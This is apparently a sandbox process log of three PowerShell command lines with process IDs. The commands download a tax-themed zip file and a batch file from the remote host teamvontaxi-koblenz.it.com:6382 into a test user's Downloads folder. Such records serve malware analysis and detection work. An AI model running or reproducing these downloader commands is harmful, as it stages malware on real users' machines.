powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://teamvontaxi-koblenz.it.com:6382/TaxPrep.zip' -OutFile 'C:\Users\test22\Downloads\CPAdocxs.zip' } catch { exit 1 }"
2732powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://teamvontaxi-koblenz.it.com:6382/TaxPrep.zip' -OutFile 'C:\Users\test22\Downloads\CPAdocxs.zip' } catch { exit 1 }"
2816powershell.exe powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://teamvontaxi-koblenz.it.com:6382/CPA.bat' -OutFile 'C:\Users\test22\Downloads\CPA.bat' }"
2948